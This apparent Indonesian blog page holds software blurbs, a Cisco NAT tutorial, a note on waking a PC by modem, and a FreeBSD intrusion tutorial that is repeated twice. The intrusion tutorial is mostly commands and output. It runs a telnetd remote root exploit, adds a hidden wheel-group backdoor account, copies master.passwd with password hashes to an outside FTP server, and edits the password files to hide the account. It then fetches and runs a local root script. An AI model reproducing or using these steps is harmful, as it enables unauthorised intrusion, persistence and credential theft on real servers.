LangOver - Apakah baik untuk perangkat lunak ini, sih? Apakah Anda pernah mencoba mengetik dalam satu bahasa tetapi hasilnya lain? Annoying, eh?! Itu s karena layout keyboard berada di salah ll language.With LangOver Anda dapat mengubah teks Anda dengan cepat antara bahasa-bahasa. Gunakan F10 (Untuk campur-baur antara bahasa-bahasa )---------------------------------------- ------------ Cukup klik F10 - dan teks Anda akan dipasang! LangOver mendukung bahasa apa pun. Hal ini dapat mengkonversi dari APAPUN ke Bahasa INGGRIS, dan dari INGGRIS ke Bahasa APAPUN. * Gunakan SHIFT + F10 untuk mengkonversi huruf besar / huruf kecil teks: Gunakan ABCABC F6 (Untuk membalik teks )----------------------------- ------- Selain dapat membalikkan LangOver teks Anda: ABCCBA
Uppercase
* Dukungan yang tersedia berupa:
Perangkat pembuat diagram (diagramming tool). Perangkat ini berguna untuk membuat DFD (Data Flow Diagram)
Pembangkit layar dan laporan (screen and report generator). Perangkat ini dapat dipakai untuk membuat prototipe laporan dengan cara memasukkan kolom atau field data pada layar.
contoh aplikasi Uppercase
* Free StatusTitle Maker 6.1
Free StatusTitle Maker menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.
* Yaldex StatusTitle Maker 5.0 5.1
Maker Yaldex StatusTitle menghasilkan kode JavaScript untuk menampilkan pesan dalam status atau judul bar. Sebagai contoh, Anda dapat menggambarkan tujuan link dalam status bar atau judul bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikontrol status bar dan 19 dikontrol efek untuk batang judul.
* KeyCleanse 1.0
KeyCleanse adalah kata kunci utama alat manajemen dan daftar bersih. Fitur-fiturnya termasuk menghapus duplikat, minimum dan maksimum menghapus kata-kata, kata-kata menghapus melebihi batas karakter, menyeret, menghitung, dan kata-kata untuk mengubah semua huruf besar, huruf kecil atau judul kasus. KeyCleanse menghapus kata kunci yang tidak memenuhi persyaratan Anda dan hanya meninggalkan kata kunci yang Anda butuhkan. KeyCleanse adalah aplikasi gratis.
* File Renamer Pro 2.0
File Renamer Pro adalah yang mudah digunakan File Renamer memungkinkan Anda untuk mengubah nama beberapa file dan folder sekaligus. Ini menawarkan berbagai cara untuk mengubah nama file, termasuk huruf besar, huruf kecil, mengubah nama ekstensi file, penyisipan, penghapusan, string pengganti, berurut mengubah nama dan Renamer more.File Pro dapat mengubah nama file MP3 yang didasarkan pada informasi tag ID3 (misalnya nama artis, judul dll ). Program ini memberikan preview file baru names.It mendukung drag dan drop.
* Yaldex StatusTitle Maker 6.1
Maker Yaldex StatusTitle menciptakan kode JavaScript untuk menampilkan pesan dalam judul dan status bar. Anda dapat menggambarkan tujuan link dalam judul atau status bar bukannya menunjukkan URL yang terkait dengannya. Juga ada banyak efek disesuaikan termasuk: Huruf Besar Di seberang, Flash, mesin ketik huruf demi huruf dan seterusnya. Akhirnya, terdapat 19 efek untuk dikendalikan judul bar dan 19 efek untuk dikendalikan status bar.
Mungkin itu yang saya ketahui tentang Case Tool
Terima Kasih
Read More..
Sabtu, 08 Agustus 2009
Login ke FreeBSD secara Siluman
Viva buat script kiddies, karena saya bukan hacker :P~, melainkan lamerz, pertama-tama jelas anda harus punya shell buat anda jadikan modal ngeroot server FreeBSD tersebut, terserah anda akan menggunakan exploits apa, yang jelas anda pasti lebih mengerti dari pada saya, saya kasih contoh pake remote exploit menggunakan telnetd 7350854.c
Ex :
[lee@linux .lee]$ ./bsd target.com
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode
######################################
ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...
## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)
percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |
oke kita tunggu sampe dapet root
## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...
command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root
!LOL anda bisa tertawa girang anda sudah mendapatkan Root, sekarang anda siapkan jurus buat mengamankan shell FreeBSD baru anda ini, dan anda add user dulu.
/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue
Terus bikin home buat anda di shell nya
mkdir /etc/.gue
terus sekolahin tuh shell biar bisa baca tulis
/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory
Wekz.!!! kok no such file , cuekin aja namanya juga lamerz sekarang kita bikin pass nya dulu
passwd gue
New password:gue1234
Retype new password:gue1234
passwd: updating the database...
passwd: done
Changing local password for gue.
okbaybeh !! sekarang anda telnet ke shell freebsd baru anda itu
FreeBSD/i386 (target.com) (ttyp3)
login: gue
Password:*****
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.
>
nahh sekarang kita racik bumbunya, kita balik ke root tadi, kita liat file master.passwd sama passwd,
cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0: 0: teacher part-time: /home/professor/ACCT/ mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00: 6925:0::0:0: User &:/etc/.pupet:/bin/tcsh
ada entry baru di file tersebut, hemm admin bisa curiga neh, kita liat juga di file passwd
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh
fiiiuuuhhh ada juga, okies santee, kita ke folder /etc
cd /etc
hemm jadi gimana donkz ?... ya udah kita buka ftp, ( pake ftp account anda dimanahlah terserah anda )
ftp
open uhamka-student.net
uhamka-student.net <-= masukin login
Password:***** <-= masukin password
udah gitu loe kirim file master.passwd sama file passwd ke ftp account loe
put master.passwd
abis itu file passwd
put passwd
setelah itu anda ambil / DL file master.passwd sama file passwd tadi dari ftp anda tadi, terus anda edit, setelah itu anda buka master.passwd menggunakan notepad.
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925: 0::0:0: User &:/etc/.pupet:/bin/tcsh <=-- ini anda hapus
jadi tinggal :
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0:0: teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
terus file tersebut anda save
setelah itu anda buka satu file lagi passwd, sama seperti tadi anda hapus "entry" yang baru aja anda buat pass add user
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= loe hapus juga ini
jadi
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
setelah itu anda save
file master.passwd sama passwd di ftp account anda, anda hapus dan file master.passwd sama passwd yang sudah anda edit anda upload ke ftp account anda lagi, setelah itu anda hapus file asli yang anda root tadi
rm master.passwd
rm passwd
anda ganti sama file master.passwd dan passwd yang sudah anda edit dan sudah anda upload ke ftp account anda, terus anda kirim lagi master.passwd sama passwd hasil editan anda ke shell tadi
kita liat hasilnya
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
upsss !! dah tidak ada, terus hilang dong account baru kita, hemmmz tidaklah kawan, coba anda telnet lagi pake user sama pass yang tadi anda buat, kita test
FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= file motd-nya saya ganti
Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda
ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye
kalau sudah anda ambil scriptnya, anda racik deh, caranya:
mv evelyne.sh su
ganti chmod nya
chmod +x su
anda jalankan scriptnya
>./su
Please hit ctrl-c twice...
nah anda tekan CTRL + c ( 2 kali )
now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password
Trying ::1...
Connected to localhost.
Escape character is '^]'.
FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Nah asik khan, sekali lagi hidup lamerz and script kiddies, thanks to all my friend at #cracxer Irc.dal.net , #cracxer will be back, thanks sekali lagi buat AXAl yang dah mau ngasih opini dan nemenin saya bikin artikel ini, juga buat petualang, kaka-joe, pak-tani, notts, babah, maffias yang Lagi bobo, ERNESTO_CHE_GUEVARRA (temen buat ke dugem) heueheu VIVA #CRACXER
Daftar exploit.
bisa anda dapatkan di www.packetstormsecurity.org, www.neworder.box.sk
Tutor ini saya rasa masih banyak "kekurangan" dan perlu pembenahan lebih dalam dari para Sang Ahli, karena sekali lagi saya cuma seorang lamerz dan sangat lamerz
-Sebelumnya Terima kasih atas kritik dan sarannya dan untuk "Jasakom.com" yang sudah mempublikasikan Artikel dari "si L@mers ini" viva jasako
Read More..
Ex :
[lee@linux .lee]$ ./bsd target.com
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode
######################################
ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...
## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)
percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |
oke kita tunggu sampe dapet root
## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...
command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root
!LOL anda bisa tertawa girang anda sudah mendapatkan Root, sekarang anda siapkan jurus buat mengamankan shell FreeBSD baru anda ini, dan anda add user dulu.
/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue
Terus bikin home buat anda di shell nya
mkdir /etc/.gue
terus sekolahin tuh shell biar bisa baca tulis
/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory
Wekz.!!! kok no such file , cuekin aja namanya juga lamerz sekarang kita bikin pass nya dulu
passwd gue
New password:gue1234
Retype new password:gue1234
passwd: updating the database...
passwd: done
Changing local password for gue.
okbaybeh !! sekarang anda telnet ke shell freebsd baru anda itu
FreeBSD/i386 (target.com) (ttyp3)
login: gue
Password:*****
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.
>
nahh sekarang kita racik bumbunya, kita balik ke root tadi, kita liat file master.passwd sama passwd,
cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0: 0: teacher part-time: /home/professor/ACCT/ mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00: 6925:0::0:0: User &:/etc/.pupet:/bin/tcsh
ada entry baru di file tersebut, hemm admin bisa curiga neh, kita liat juga di file passwd
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh
fiiiuuuhhh ada juga, okies santee, kita ke folder /etc
cd /etc
hemm jadi gimana donkz ?... ya udah kita buka ftp, ( pake ftp account anda dimanahlah terserah anda )
ftp
open uhamka-student.net
uhamka-student.net <-= masukin login
Password:***** <-= masukin password
udah gitu loe kirim file master.passwd sama file passwd ke ftp account loe
put master.passwd
abis itu file passwd
put passwd
setelah itu anda ambil / DL file master.passwd sama file passwd tadi dari ftp anda tadi, terus anda edit, setelah itu anda buka master.passwd menggunakan notepad.
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925: 0::0:0: User &:/etc/.pupet:/bin/tcsh <=-- ini anda hapus
jadi tinggal :
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0:0: teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
terus file tersebut anda save
setelah itu anda buka satu file lagi passwd, sama seperti tadi anda hapus "entry" yang baru aja anda buat pass add user
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= loe hapus juga ini
jadi
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
setelah itu anda save
file master.passwd sama passwd di ftp account anda, anda hapus dan file master.passwd sama passwd yang sudah anda edit anda upload ke ftp account anda lagi, setelah itu anda hapus file asli yang anda root tadi
rm master.passwd
rm passwd
anda ganti sama file master.passwd dan passwd yang sudah anda edit dan sudah anda upload ke ftp account anda, terus anda kirim lagi master.passwd sama passwd hasil editan anda ke shell tadi
kita liat hasilnya
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
upsss !! dah tidak ada, terus hilang dong account baru kita, hemmmz tidaklah kawan, coba anda telnet lagi pake user sama pass yang tadi anda buat, kita test
FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= file motd-nya saya ganti
Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda
ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye
kalau sudah anda ambil scriptnya, anda racik deh, caranya:
mv evelyne.sh su
ganti chmod nya
chmod +x su
anda jalankan scriptnya
>./su
Please hit ctrl-c twice...
nah anda tekan CTRL + c ( 2 kali )
now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password
Trying ::1...
Connected to localhost.
Escape character is '^]'.
FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Nah asik khan, sekali lagi hidup lamerz and script kiddies, thanks to all my friend at #cracxer Irc.dal.net , #cracxer will be back, thanks sekali lagi buat AXAl yang dah mau ngasih opini dan nemenin saya bikin artikel ini, juga buat petualang, kaka-joe, pak-tani, notts, babah, maffias yang Lagi bobo, ERNESTO_CHE_GUEVARRA (temen buat ke dugem) heueheu VIVA #CRACXER
Daftar exploit.
bisa anda dapatkan di www.packetstormsecurity.org, www.neworder.box.sk
Tutor ini saya rasa masih banyak "kekurangan" dan perlu pembenahan lebih dalam dari para Sang Ahli, karena sekali lagi saya cuma seorang lamerz dan sangat lamerz
-Sebelumnya Terima kasih atas kritik dan sarannya dan untuk "Jasakom.com" yang sudah mempublikasikan Artikel dari "si L@mers ini" viva jasako
Read More..
Cara Menghidupkan Komputer Dengan Remote Area
Anda ingin menghidupkan PC anda dirumah secara otomatis dari kantor atau tempat lain. Hal ini cukup mudah, hanya saja PC anda harus memakai main board P2AB dan terhubung dengan modem apa saja. Dan yg lebih penting lagi modem anda terhubung ke PC dan ke line telpon.
Hubungi no telp tsb yg menghubungkan PC anda dengan modem dari tempat lain dan TA DA.......
PC anda akan segera hidup (waken up from death), hal ini dapat anda manfaatkan dengan fungsi software penerima fax pada PC anda yg dapat di pasang pada startup.
Perlu anda ketahui bahwa hal ini terjadi adalah dari setingan main board tsb.
Read More..
Hubungi no telp tsb yg menghubungkan PC anda dengan modem dari tempat lain dan TA DA.......
PC anda akan segera hidup (waken up from death), hal ini dapat anda manfaatkan dengan fungsi software penerima fax pada PC anda yg dapat di pasang pada startup.
Perlu anda ketahui bahwa hal ini terjadi adalah dari setingan main board tsb.
Read More..
Konfigurasi Router NAT pada windows 2000 server
Network Address Translation (NAT) adalah suatu teknik untuk mengubah suatu IP address ke IP address yg lain. Hal ini bisa dikarenakan karena di jaringan kita mengunakan network address yg disebut private address space di RFC 1918, yaitu:
10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)
Dan karena ini adalah private address, jaringan kita tentunya tidak dapat berkomunikasi dgn jaringan lain di Internet, karena semua host yg ingin terkoneksi di Internet harus menggunakan global atau public IP address. Untuk ini kita perlu men-translate IP address kita yg private menjadi public IP address.
Alasan lain untuk menggunakan NAT adalah security. Kita bisa men-translate seluruh jaringan kita (missal 254 PC) menjadi 1 public IP. Teknik ini disebut many-to-one NAT atau biasa disebut Port Address Translation (PAT). Teknik ini sangat bermanfaat jika kita menginginkan user di jaringan kita untuk meng-inisiasi koneksi ke Internet (browsing internet atau mengirim email misalnya), tapi kita tidak menginginkan host dari Internet untk meng-inisiasi koneksi ke PC user kita.
Host dari Internet tidak bisa meng-inisiasi koneksi ke internal host kita karena hanya ada 1 public IP address yg terlihat di jaringan kita, sedangkan jumlah PC yg sebenarnya ada lebih dari 1. Tentunya jika PC kita yg meng-inisiasi, maka reply atau return packet akan bisa
kembali karena device yg kita gunakan untuk melakukan NAT, akan memiliki mapping table dari NAT yg terjadi di jaringan.
Untuk kasus one-to-one NAT, dimana 1 private IP akan di-translate menjadi 1 global IP, maka mapping nya akan spt berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
— 195.1.134.1 192.168.1.1 — —
— 195.1.134.2 192.168.1.2 — —
Dalam contoh ini, IP private 192.168.1.1 di-translate ke public IP 195.1.134.1, IP private 192.168.1.2 di-translate ke public IP 195.1.134.2 dst.
Inside local adalah terminologi utk real IP address PC di jaringan kita, sedangkan Inside Global adalah public IP address yg kita gunakan untuk men-translasi real IP address tsb.
Outside local adalah local IP address dari tujuan kita sebagaimana kita melihatnya dari jaringan kita. Sedangkan Outside global adalah global IP address dari tujuan kita yg terlihat di Internet.
Ini bermanfaat utk destination based NAT, sbg contoh sbg berikut:
Ada server di Internet dgn global IP address 11.11.11.11, tapi kita ingin semua users di jaringan kita utk melihat server tsb sbg 192.168.1.11
Maka kita bisa melakukan destination based NAT, dgn outside local adalah 192.168.1.11 dan outside global, IP address tujuan yg sebenernya, adalah 11.11.11.11.
Jika kita tidak melakukan destination based NAT, maka outside local dan outside global dari tujuan kita akan sama, yaitu public IP tujuan yg sebenernya, dan ini bisa dilihat di contoh mapping PAT.
Untuk contoh many-to-one NAT atau PAT, dimana banyak real IP dari PC kita di-translate menjadi 1 public IP, maka contoh mapping nya sbg berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
tcp 195.1.134.4:12338 192.168.1.3:12338 33.33.33.33:23 33.33.33.33:23
tcp 195.1.134.4:12337 192.168.1.2:12337 22.22.22.22:23 22.22.22.22:23
Dalam contoh ini, kita melakukan telnet (destination tcp port 23) ke remote host 22.22.22.22
dari private IP 192.168.1.2, dan telnet ke remote host 33.33.33.33 dari private IP 192.168.1.3.
Kita bisa lihat bahwa ke-2 private IP kita di-translate ke public IP yg sama, yaitu 195.1.134.4. Yg membedakan adalah source port yg digunakan di public IP.
Jadi di mapping ini terlihat bahwa koneksi dari 192.168.1.2 di map ke 195.1.134.4 port 12337, sedangkan koneksi dari 192.168.1.3 di map ke 195.1.134.4 port 12338.
Dgn adanya mapping ini, remote host 22.22.22.22 ketika mengirimkan paket reply (ingat di TCP/IP reply dari remote host destination portnya ditujukan ke source port dari host kita), akan mengirimkan paket ke 195.1.134.4 port 12337. Sedangkan reply packet dari 33.33.33.33 kan ke 195.1.134.4 port 12338.
Berdasarkan mapping tadi, NAT device atau router yg melakukan map bisa mengetahui bahwa packet reply dari 22.22.22.22 harus dikirimkan ke host 192.168.1.2 dan paket reply dari 33.33.33.33 harus dikirimkan ke host 192.168.1.3
Dari ke-2 contoh di atas kelihatan bahwa untuk normal NAT atau one-to-one NAT, setiap private IP akan memiliki public IP sendiri sehingga setiap host di jaringan kita masih bisa di hubungi dari luar. Host dari Internet masih bisa utk menghubungi tiap host kita karena
mereka memiliki public IP yg berbeda-beda.
Namun untuk kasus many-to-one NAT atau PAT, host dari Internet tidak dapat menghubungi setiap host karena semua host memiliki 1 public IP yg sama. Host dari internet hanya bisa me-reply koneksi dari host kita berdasarkan source port yg berbeda-beda.
Ok, langsung masuk contoh konfigurasi biar makin jelas. Contoh dilakukan dgn menggunakan Cisco router dgn 1 ethernet interface konek ke internal network dan 1 serial interface konek ke Internet. Kalo udah ngerti konsepnya bisa pake NAT device apa aja, gue sendiri buat memproteksi home lab gue pake OpenBSD PF.
Topologi:
Internal network – (eth0) router (s0/0) – internet
Internal network kita menggunakan private IP 192.168.1.0/24. IP address eth0 router kita 192.168.1.1 yg merupakan default gateway dari semua host di internal network.
1. Many-to-one PAT, semua private IP ke 1 public IP address
Kita cuma dapet 1 IP address dari ISP 195.1.134.2/30 yg juga merupakan IP address serial 0/0, router ISP kita menggunakan IP 195.1.134.1 yg juga merupakan default route router kita.
Maka konfigurasi PAT sbg berikut:
- Buat ACL yg mem-permit semua network 192.168.1.0/24
Router(config)#ip access-list standard internal_network
Router(config-std-nacl)#permit 192.168.1.0 0.0.0.255
- Bikin NAT rule untuk mentranslate net 192.168.1.0/24 ke 195.1.134.2 yg merupakan IP address s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- enable NAT di interface e0/0 dan s0/0
Router(config)#int e0/0
Router(config-if)#ip nat inside
Router(config)#int s0/0
Router(config-if)#ip nat outside
2. ISP kita ternyata memberikan kita public IP 195.1.134.0/24, yg berarti range public IP yg bisa kita gunakan adalah 195.1.134.1 – 195.1.134.254. Ini berarti kita bisa melakukan one-to-one NAT, contoh:
192.168.1.1 ke 195.1.134.1
192.168.1.2 ke 195.1.134.2, dst.
Maka konfigurasi yg perlu dilakukan hanya:
Router(config)#ip nat inside source static network 192.168.1.0 195.1.134.0 /24
Tentunya enable NAT di e0/0 dan s0/0 spt contoh no.1
3. Kalo gak dapet persis 254 public IP gimana? Misal dapetnya 195.1.134.0/29, yg berarti range public IP yg bisa digunakan adalah 195.1.134.1-195.1.134.6 (ingat dgn /29 ada total 8 IP dari 0 sampai 7, tapi 0 adalah network address dan 7 sebagai IP terakhir merupakan
broadcast address).
Jika kita mau mentranslate net 192.168.1.0/24 ke range IP 195.1.134.1-195.1.134.6
- bikin NAT pool
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.6 netmask 255.255.255.248
- bikin NAT rule, pake ACL internal_network spt contoh no.1 buat permit semua internal net 192.168.1.0/24
Router(config)#ip nat inside source list intenal_network pool public_IP
Jgn lupa enable NAT di e0/0 dan s0/0 spt contoh no.1
4. Ada masalah dgn contoh no.3? Ada.
Dalam 1 waktu, hanya ada 6 internal private IP yg bisa di translate ke 6 public IP. Jadi koneksi dari internal host ke 7 akan gagal dan harus menunggu sampai translation mapping timeout dan di clear, sehingga public ip kembali tersedia.
